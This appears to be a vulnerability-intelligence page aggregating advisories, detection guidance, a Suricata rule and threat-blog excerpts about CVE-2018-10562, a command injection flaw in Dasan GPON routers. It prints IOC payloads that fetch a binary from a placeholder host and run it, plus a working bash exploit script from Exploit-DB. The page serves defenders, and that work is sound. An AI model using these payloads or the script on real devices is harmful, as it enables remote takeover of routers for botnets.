CVE-2018-10562
published 2018-05-04CVE-2018-10562: An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a…
PriorityP196critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-04-21
Exploited in the wild
EPSS
99.95%
100.0th percentile
An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.
Detection & IOCsextracted from sources · hover to see the quote
commandXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s/gpon80+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0↗
commandXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s/gpon8080+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0↗
- →Exploit requests target the URI GponForm/diag_Form with POST parameters XWebPageName=diag, diag_action=ping, and shell metacharacters (backtick command injection) in the dest_host parameter. ↗
- →Attackers retrieve command output by revisiting /diag.html after injecting commands; monitor for GET requests to /diag.html following suspicious POST requests to GponForm/diag_Form. ↗
- →Exploit payload drops and executes wget-fetched binaries in /tmp (e.g., /tmp/gpon80, /tmp/gpon8080); monitor for file creation and shell execution in /tmp on GPON router firmware. ↗
- →CVE-2018-10562 is chained with CVE-2018-10561 (authentication bypass); detection should look for unauthenticated POST requests to GponForm/diag_Form. ↗
- →Omni/Mirai variant samples use XOR encryption table key 0xBAADF00D for config string encryption; use this key when decrypting captured botnet config tables. ↗
- →Okane campaign payload server briefly replaced with Cloudflare DNS IP 1.1.1.1 on June 13; monitor for botnet C2 traffic pivoting to 1.1.1.1 as a payload source. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Dasan GPON Routers Command Injection Vulnerability
cisa·2022-03-31·CVSS 9.8
CVE-2018-10562 [CRITICAL] CWE-78 Dasan GPON Routers Command Injection Vulnerability
Vulnerability: Dasan GPON Routers Command Injection Vulnerability
Affected: Dasan Gigabit Passive Optical Network (GPON) Routers
Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10561, exploitation can allow an attacker to perform remote code execution.
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-10562
Remediation Due Date: 2022-04-21
CISA
Dasan GPON Routers Authentication Bypass Vulnerability
cisa·2022-03-31·CVSS 9.8
CVE-2018-10561 [CRITICAL] CWE-287 Dasan GPON Routers Authentication Bypass Vulnerability
Vulnerability: Dasan GPON Routers Authentication Bypass Vulnerability
Affected: Dasan Gigabit Passive Optical Network (GPON) Routers
Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10562, exploitation can allow an attacker to perform remote code execution.
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-10561
Remediation Due Date: 2022-04-21
GHSA
GHSA-6x97-cqx6-mvmq: An issue was discovered on Dasan GPON home routers
ghsa_unreviewed·2022-05-13
CVE-2018-10562 [CRITICAL] CWE-78 GHSA-6x97-cqx6-mvmq: An issue was discovered on Dasan GPON home routers
An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.
VulnCheck
Dasan GPON Routers Authentication Bypass Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-10561 [CRITICAL] CWE-287 Dasan GPON Routers Authentication Bypass Vulnerability
Dasan GPON Routers Authentication Bypass Vulnerability
Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10562, exploitation can allow an attacker to perform remote code execution.
Affected: Dasan Gigabit Passive Optical Network (GPON) Routers
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Known Ransomware Campaign Use: Known
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2018-10561; https://blog.netlab.360.com/botnets-never-die-satori-refuses-to-fade-away-en/; https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/; https://www.virusbulletin.com/virusbulletin/2019/12/vb2019-paper-absolutely-routed-why-routers-are-new-bul
VulnCheck
Dasan GPON Routers Command Injection Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-10562 [CRITICAL] CWE-78 Dasan GPON Routers Command Injection Vulnerability
Dasan GPON Routers Command Injection Vulnerability
Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10561, exploitation can allow an attacker to perform remote code execution.
Affected: Dasan Gigabit Passive Optical Network (GPON) Routers
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Known Ransomware Campaign Use: Known
Exploitation References: https://blog.netlab.360.com/botnets-never-die-satori-refuses-to-fade-away-en/; https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/; https://www.ndss-symposium.org/wp-content/uploads/2019/02/ndss2019_02B-3_Herwig_paper.pdf; https://www.trendmicro.com/en_us/research/19/e/new-mirai-variant-uses-multiple-exploits
Suricata
ET EXPLOIT HackingTrio UA (Hello, World)
suricata·2018-05-11
CVE-2018-10561 ET EXPLOIT HackingTrio UA (Hello, World)
ET EXPLOIT HackingTrio UA (Hello, World)
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT HackingTrio UA (Hello, World)"; flow:established,to_server; http.method; content:"POST"; http.user_agent; content:"Hello, World"; fast_pattern; endswith; reference:cve,2018-10561; reference:cve,2018-10562; reference:url,github.com/f3d0x0/GPON; classtype:attempted-admin; sid:2025576; rev:4; metadata:attack_target IoT, created_at 2018_05_11, cve CVE_2018_10561, deployment Perimeter, performance_impact Low, signature_severity Major, tag GPON, updated_at 2020_09_16;)
Exploit-DB
GPON Routers - Authentication Bypass / Command Injection
exploitdb·2018-05-03
CVE-2018-10562 GPON Routers - Authentication Bypass / Command Injection
GPON Routers - Authentication Bypass / Command Injection
---
#!/bin/bash
echo "[+] Sending the Command… "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting…."
sleep 3
echo "[+] Retrieving the ouput…."
curl -k $1/diag.html?images/ 2>/dev/null | grep ‘diag_result = ‘ | sed -e ‘s/\\n/\n/g’
Nuclei
Dasan GPON Devices - Remote Code Execution
nuclei·CVSS 9.8
CVE-2018-10562 [CRITICAL] Dasan GPON Devices - Remote Code Execution
Dasan GPON Devices - Remote Code Execution
Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.
Template:
id: CVE-2018-10562
info:
name: Dasan GPON Devices - Remote Code Execution
author: gy741
severity: critical
description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's q
Bleepingcomputer
New Aquabotv3 botnet malware targets Mitel command injection flaw
blogs_bleepingcomputer·2025-01-29·CVSS 7.2
CVE-2024-41710 [HIGH] New Aquabotv3 botnet malware targets Mitel command injection flaw
## New Aquabotv3 botnet malware targets Mitel command injection flaw
## Bill Toulas
A new variant of the Mirai-based botnet malware Aquabot has been observed actively exploiting CVE-2024-41710, a command injection vulnerability in Mitel SIP phones.
The activity was discovered by Akamai's Security Intelligence and Response Team (SIRT), who reports that this is the third variant of Aquabot that falls under their radar.
The malware family was introduced in 2023, and a second version that added persistence mechanisms was released later. The third variant, 'Aquabotv3,' introduced a system that detects termination signals and sends the info to the command-and-control (C2) server.
Akamai comments that Aquabotv3's mechanism to report back kill attempts is unusual for botnets and may have been
Fortinet
The Growing Threat of Malware Concealed Behind Cloud Services | FortiGuard Labs
blogs_fortinet·2024-06-25·CVSS 9.8
[CRITICAL] The Growing Threat of Malware Concealed Behind Cloud Services | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
The Growing Threat of Malware Concealed Behind Cloud Services
UNSTABLE Botnet
Condi DDoS Botnet
UDP Flooder and Process Checker
Skibidi
Conclusion
Fortinet Protections
IOCs
C2
URLs
Files
By Cara Lin and Vincent Li | June 25, 2024
Affected Platforms: Linux Distributions
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
Cybersecurity threats are increasingly leveraging cloud services to store, distribute, and establish command and control (C2) servers, such as VCRUMS stored on AWS or SYK Crypter distributed via DriveHQ. This shift in strategy presents significant challenges for detection and prevention, as cloud services provide scalability, anonymity, and resilience that traditional hostin
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (August-October 2020)
Yue Guan
Lei Xu
Ken Hsu
Zhibin Zhang
Published: January 22, 2021
Malware
Trend Reports
Vulnerabilities
DDoS
Exploits
IoT
Network security trends
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823 , which were the most commonly exploited vulnerabilities in the wild in early summer 2020 , are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213 , have emerged and were being utilized at a constant and concern
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823, which were the most commonly exploited vulnerabilities in the wild in early summer 2020, are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213, have emerged and were being utilized at a constant and concerning rate as of fall 2020. To complicate matters, malicious actors are well aware that new exploits aren’t always needed to get the job done. Based on observations of malicious traffic for the designated three months, weaponized ThinkPHP vulnerabilities like CVE-2018-20062 and CVE-2019-908
Trendmicro
IoT Monitoring-Daten zu Threat Defense umwandeln
blogs_trendmicro·2020-10-14
IoT Monitoring-Daten zu Threat Defense umwandeln
Cyberbedrohungen
## IoT Monitoring-Daten zu Threat Defense umwandeln
Um seine Kunden noch besser vor Cyberbedrohungen zu schützen, verwendet Trend Micro die gesammelten Indicators of Compromise aus IoTAngriffen, um die Fähigkeit zur Erkennung von Bedrohungen zu verbessern.
By: Shimamura Makoto Oct 14, 2020 Read time: ( words)
Save to Folio
Originalartikel von Shimamura Makoto, Senior Security Specialist
Der Sicherheitsbericht zur Jahresmitte 2020 von Trend Micro weist im Vergleich zum zur zweiten Jahreshälfte 2019 eine Steigerung von 70 Prozent bei Angriffen auf Geräte und Router aus. Dazu gehören auch Attacken auf Internet-of-Things (IoT)-Systeme, die in ihrer Häufung beunruhigen. Die Sicherheitsforscher von Trend Micro überwachen die Trends bezüglich dieser Angriffe und untersuchte
Trendmicro
Transforming IoT Monitoring Data into Threat Defense
blogs_trendmicro·2020-10-08
Transforming IoT Monitoring Data into Threat Defense
IoT
# Transforming IoT Monitoring Data into Threat Defense
In this article, we feature data gathered from our continuous monitoring of C&C servers of botnets such as Mirai and Bashlite. We also share how this data is used to bolster the protection of IoT devices.
By: Shimamura Makoto
2020/10/08
Read time: ( words)
Save to Folio
In our midyear roundup report, we shared that in the first half of 2020, there was a 70% increase in inbound attacks on devices and routers compared with the second half of 2019. This data includes attacks on Internet of Things (IoT) systems, which remain alarming and prevalent.
With the aim of protecting customers effectively by continuously monitoring trends in IoT attacks, we examined Mirai and Bashlite (aka Qbot), two notorious IoT botnet malware types th
Trendmicro
Neko, Mirai and Bashlite Target Routers, Devices
blogs_trendmicro·2019-08-13
Neko, Mirai and Bashlite Target Routers, Devices
# Neko, Mirai and Bashlite Target Routers, Devices
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks.
By: Augusto Remillano II, Jakub Urbanec
Aug 13, 2019
Read time: ( words)
Save to Folio
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. On July 22, 2019, we saw and started analyzing a Neko botnet sample, then observed another sample with additional exploits the following week. A Mirai variant that calls itself “Asher” surfaced on July 30, then a Bashlite variant called “Ayedz” the following week. These malware variants enlis
Trendmicro
Neko, Mirai and Bashlite Target Routers, Devices
blogs_trendmicro·2019-08-13
Neko, Mirai and Bashlite Target Routers, Devices
# Neko, Mirai and Bashlite Target Routers, Devices
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks.
By: Augusto Remillano II, Jakub Urbanec
2019/08/13
Read time: ( words)
Save to Folio
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. On July 22, 2019, we saw and started analyzing a Neko botnet sample, then observed another sample with additional exploits the following week. A Mirai variant that calls itself “Asher” surfaced on July 30, then a Bashlite variant called “Ayedz” the following week. These malware variants enlist
Trendmicro
New Mirai Variant Uses Multiple Exploits
blogs_trendmicro·2019-05-23
New Mirai Variant Uses Multiple Exploits
Exploits & Vulnerabilities
# New Mirai Variant Uses Multiple Exploits
We discovered a new variant of Mirai that uses a total of 13 different exploits, almost all of which have been used in previous Mirai-related attacks. Typical of Mirai variants, it has backdoor and distributed denial-of-service (DDoS) capabilities.
By: Augusto Remillano II, Jakub Urbanec
May 23, 2019
Read time: ( words)
Save to Folio
We discovered a new variant of Mirai (detected as Backdoor.Linux.MIRAI.VWIPT) that uses a total of 13 different exploits, almost all of which have been used in previous Mirai-related attacks. Typical of Mirai variants, it has backdoor and distributed denial-of-service (DDoS) capabilities. However, this case stands out as the first to have used all 13 exploits together in a single campa
Trendmicro
New Mirai Variant Uses Multiple Exploits
blogs_trendmicro·2019-05-23
New Mirai Variant Uses Multiple Exploits
Exploits & Vulnerabilities
# New Mirai Variant Uses Multiple Exploits
We discovered a new variant of Mirai that uses a total of 13 different exploits, almost all of which have been used in previous Mirai-related attacks. Typical of Mirai variants, it has backdoor and distributed denial-of-service (DDoS) capabilities.
By: Augusto Remillano II, Jakub Urbanec
2019/05/23
Read time: ( words)
Save to Folio
We discovered a new variant of Mirai (detected as Backdoor.Linux.MIRAI.VWIPT) that uses a total of 13 different exploits, almost all of which have been used in previous Mirai-related attacks. Typical of Mirai variants, it has backdoor and distributed denial-of-service (DDoS) capabilities. However, this case stands out as the first to have used all 13 exploits together in a single campaig
Trendmicro
ThinkPHP Vulnerability Abused by Botnets
blogs_trendmicro·2019-01-25
ThinkPHP Vulnerability Abused by Botnets
IoT
## ThinkPHP Vulnerability Abused by Botnets
We found a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai abusing a ThinkPHP flaw for propagation and DDoS attacks.
By: Augusto Remillano II 2019/01/25 Read time: ( words)
Save to Folio
Cybercriminals are exploiting a ThinkPHP vulnerability — one that was disclosed and patched in December 2018 — for botnet propagation by a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai. Cybercriminals use websites created using the PHP framework to breach web servers via dictionary attacks on default credentials and gain control of these routers for distributed denial of service attacks ( DDoS ). Our telemetry showed that these two particular malware types caused a sudden increase in attacks and infection attempts from Janua
Trendmicro
ThinkPHP Vulnerability Abused by Botnets
blogs_trendmicro·2019-01-25
ThinkPHP Vulnerability Abused by Botnets
IoT
# ThinkPHP Vulnerability Abused by Botnets
We found a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai abusing a ThinkPHP flaw for propagation and DDoS attacks.
By: Augusto Remillano II
Jan 25, 2019
Read time: ( words)
Save to Folio
Cybercriminals are exploiting a ThinkPHP vulnerability — one that was disclosed and patched in December 2018 — for botnet propagation by a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai. Cybercriminals use websites created using the PHP framework to breach web servers via dictionary attacks on default credentials and gain control of these routers for distributed denial of service attacks (DDoS). Our telemetry showed that these two particular malware types caused a sudden increase in attacks and infection attempts from Janua
Trendmicro
ThinkPHP Vulnerability Abused by Botnets
blogs_trendmicro·2019-01-25
ThinkPHP Vulnerability Abused by Botnets
IoT
# ThinkPHP Vulnerability Abused by Botnets
We found a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai abusing a ThinkPHP flaw for propagation and DDoS attacks.
By: Augusto Remillano II
2019/01/25
Read time: ( words)
Save to Folio
Cybercriminals are exploiting a ThinkPHP vulnerability — one that was disclosed and patched in December 2018 — for botnet propagation by a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai. Cybercriminals use websites created using the PHP framework to breach web servers via dictionary attacks on default credentials and gain control of these routers for distributed denial of service attacks (DDoS). Our telemetry showed that these two particular malware types caused a sudden increase in attacks and infection attempts from January
Trendmicro
ThinkPHP Vulnerability Abused by Botnets
blogs_trendmicro·2019-01-25
ThinkPHP Vulnerability Abused by Botnets
IoT
## ThinkPHP Vulnerability Abused by Botnets
We found a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai abusing a ThinkPHP flaw for propagation and DDoS attacks.
By: Augusto Remillano II Jan 25, 2019 Read time: ( words)
Save to Folio
Cybercriminals are exploiting a ThinkPHP vulnerability — one that was disclosed and patched in December 2018 — for botnet propagation by a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai. Cybercriminals use websites created using the PHP framework to breach web servers via dictionary attacks on default credentials and gain control of these routers for distributed denial of service attacks ( DDoS ). Our telemetry showed that these two particular malware types caused a sudden increase in attacks and infection attempts from Jan
Securelist
New trends in the world of IoT threats
blogs_securelist·2018-09-18
New trends in the world of IoT threats
Authors
Mikhail Kuzin
Yaroslav Shmelev
Vladimir Kuskov
Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.
We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.
Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018.
One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our honeypot
Securelist
New trends in the world of IoT threats
blogs_securelist·2018-09-18
New trends in the world of IoT threats
Authors
- Mikhail Kuzin
- Yaroslav Shmelev
- Vladimir Kuskov
Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.
We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.
Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018.
One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our hone
Unit42
Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
blogs_unit42·2018-09-10·CVSS 9.8
CVE-2017-5638 [CRITICAL] Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
Threat Research Center
Threat Research
Malware
## Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
Ruchna Nigam
Published: September 9, 2018
Malware
Threat Research
Vulnerabilities
Apache Struts
BlackNurse
Botnet
CVE-2017-5638
CVE-2018-9866
Exploits
Gafgyt
IoT
Linux
Mirai
SonicWall RCE
Executive Summary:
Unit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These are the IoT botnets associated with unprecedented Distributed Denial of Service attacks in November 2016 and since.
These variants are notable for two reasons:
The new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017.
The new Gafgyt version targets a newly disclosed vulnerability affectin
Unit42
Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
blogs_unit42·2018-09-10·CVSS 9.8
[CRITICAL] Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
Executive Summary:
Unit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These are the IoT botnets associated with unprecedented Distributed Denial of Service attacks in November 2016 and since.
These variants are notable for two reasons:
- The new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017.
- The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).
These developments suggest these IOT botnets are increasingly targeting enterprise devices with outdated versions.
All organizations should ensure they keep not only their systems up-to-date and patched, but also their IoT devices. For Palo Alto Networks cust
Unit42
Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
blogs_unit42·2018-07-20·CVSS 9.8
[CRITICAL] Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.
Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that incorporated nine exploits in its code.
In their newest evolution, samples also target the D-Link DSL-2750B OS Command Injection vulnerability, only a few weeks after the publication of its Metasploit module on the 25th of May (even though the vulnerability has been public knowledge since February of 2016).
While exploring sa
Unit42
Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
blogs_unit42·2018-07-20·CVSS 9.8
[CRITICAL] Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
Threat Research Center
Threat Research
Malware
## Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
Ruchna Nigam
Published: July 20, 2018
Malware
Threat Research
Botnet
DDoS
Exploits
Gafgyt
Hakai
IoT
Linux
Mirai
Okane
Omni
The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.
Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that incorporated nine exploits in its code.
In their newest evolution, samples
Trendmicro
GPON Bugs Exploited for Mirai-like Scanning Activities
blogs_trendmicro·2018-05-21·CVSS 9.8
CVE-2018-10561 [CRITICAL] GPON Bugs Exploited for Mirai-like Scanning Activities
Exploits & Vulnerabilities
## GPON Bugs Exploited for Mirai-like Scanning Activities
We recently found similar Mirai-like scanning activity from Mexico with some being done via the exploitation of CVE-2018-10561 and CVE-2018-10562, two vulnerabilities that are specific to Gigabit Passive Optical Network (GPON)-based home routers.
By: IoT Reputation Service Team, Smart Home Network Team 2018/05/21 Read time: ( words)
Save to Folio
In April, we discussed our findings on increased activity originating from China targeting network devices in Brazil that mimicked the Mirai botnet’s scanning technique. We recently found similar Mirai-like scanning activity from Mexico. The difference in these attacks, however, is that some of the detected activity is being done via the exploitation of CVE-2
Trendmicro
GPON Bugs Exploited for Mirai-like Scanning Activities
blogs_trendmicro·2018-05-21·CVSS 9.8
CVE-2018-10561 [CRITICAL] GPON Bugs Exploited for Mirai-like Scanning Activities
Exploits & Vulnerabilities
## GPON Bugs Exploited for Mirai-like Scanning Activities
We recently found similar Mirai-like scanning activity from Mexico with some being done via the exploitation of CVE-2018-10561 and CVE-2018-10562, two vulnerabilities that are specific to Gigabit Passive Optical Network (GPON)-based home routers.
By: IoT Reputation Service Team, Smart Home Network Team May 21, 2018 Read time: ( words)
Save to Folio
In April, we discussed our findings on increased activity originating from China targeting network devices in Brazil that mimicked the Mirai botnet’s scanning technique. We recently found similar Mirai-like scanning activity from Mexico. The difference in these attacks, however, is that some of the detected activity is being done via the exploitation of CVE
Trendmicro
GPON Bugs Exploited for Mirai-like Scanning Activities
blogs_trendmicro·2018-05-21·CVSS 9.8
CVE-2018-10561 [CRITICAL] GPON Bugs Exploited for Mirai-like Scanning Activities
Exploits & Vulnerabilities
# GPON Bugs Exploited for Mirai-like Scanning Activities
We recently found similar Mirai-like scanning activity from Mexico with some being done via the exploitation of CVE-2018-10561 and CVE-2018-10562, two vulnerabilities that are specific to Gigabit Passive Optical Network (GPON)-based home routers.
By: IoT Reputation Service Team, Smart Home Network Team
2018/05/21
Read time: ( words)
Save to Folio
In April, we discussed our findings on increased activity originating from China targeting network devices in Brazil that mimicked the Mirai botnet’s scanning technique. We recently found similar Mirai-like scanning activity from Mexico. The difference in these attacks, however, is that some of the detected activity is being done via the exploitation of CVE-2
Trendmicro
GPON Bugs Exploited for Mirai-like Scanning Activities
blogs_trendmicro·2018-05-21·CVSS 9.8
CVE-2018-10561 [CRITICAL] GPON Bugs Exploited for Mirai-like Scanning Activities
Exploits y vulnerabilidades
## GPON Bugs Exploited for Mirai-like Scanning Activities
We recently found similar Mirai-like scanning activity from Mexico with some being done via the exploitation of CVE-2018-10561 and CVE-2018-10562, two vulnerabilities that are specific to Gigabit Passive Optical Network (GPON)-based home routers.
By: IoT Reputation Service Team, Smart Home Network Team May 21, 2018 Read time: ( words)
Save to Folio
In April, we discussed our findings on increased activity originating from China targeting network devices in Brazil that mimicked the Mirai botnet’s scanning technique. We recently found similar Mirai-like scanning activity from Mexico. The difference in these attacks, however, is that some of the detected activity is being done via the exploitation of CV
Trendmicro
GPON Bugs Exploited for Mirai-like Scanning Activities
blogs_trendmicro·2018-05-21·CVSS 9.8
CVE-2018-10561 [CRITICAL] GPON Bugs Exploited for Mirai-like Scanning Activities
Ausnutzung von Schwachstellen
## GPON Bugs Exploited for Mirai-like Scanning Activities
We recently found similar Mirai-like scanning activity from Mexico with some being done via the exploitation of CVE-2018-10561 and CVE-2018-10562, two vulnerabilities that are specific to Gigabit Passive Optical Network (GPON)-based home routers.
By: IoT Reputation Service Team, Smart Home Network Team May 21, 2018 Read time: ( words)
Save to Folio
In April, we discussed our findings on increased activity originating from China targeting network devices in Brazil that mimicked the Mirai botnet’s scanning technique. We recently found similar Mirai-like scanning activity from Mexico. The difference in these attacks, however, is that some of the detected activity is being done via the exploitation of
Qualys
Timely Password-Change Call from Twitter, as Bugs Hit WebEx and GPON routers | Qualys
blogs_qualys·2018-05-08
Timely Password-Change Call from Twitter, as Bugs Hit WebEx and GPON routers | Qualys
The cyber security news cycle is always active, so to help you stay in the loop here’s a selection of incidents that caught our attention over the past week or so involving, among others, Twitter, Cisco and GPON routers.
### Twitter picks a good day for password-change call
As “change your password” calls from vendors go, the one from Twitter last week ranks right up there, and not just because of the scope of users involved. As Jon Swartz pointed out in Barron’s, Twitter’s alert went out on Thursday, which happened to be World Password Day.
The social media juggernaut reached out to all of its 330 million users and advised them to take a moment, go to their account settings page and enter a new password. Twitter also suggested they enable Twitter’s two-step verification feature, a move
Qualys
Timely Password-Change Call from Twitter, as Bugs Hit WebEx and GPON routers
blogs_qualys·2018-05-08
Timely Password-Change Call from Twitter, as Bugs Hit WebEx and GPON routers
The cyber security news cycle is always active, so to help you stay in the loop here’s a selection of incidents that caught our attention over the past week or so involving, among others, Twitter, Cisco and GPON routers.
## Twitter picks a good day for password-change call
As “change your password” calls from vendors go, the one from Twitter last week ranks right up there, and not just because of the scope of users involved. As Jon Swartz pointed out in Barron’s, Twitter’s alert went out on Thursday, which happened to be World Password Day .
The social media juggernaut reached out to all of its 330 million users and advised them to take a moment, go to their account settings page and enter a new password. Twitter also suggested they enable Twitter’s two-step verification feature, a move
http://www.securityfocus.com/bid/107053https://www.exploit-db.com/exploits/44576/https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/http://www.securityfocus.com/bid/107053https://www.exploit-db.com/exploits/44576/https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-10562
2018-05-04
Published
2022-03-31
Added to CISA KEV
Exploited in the wild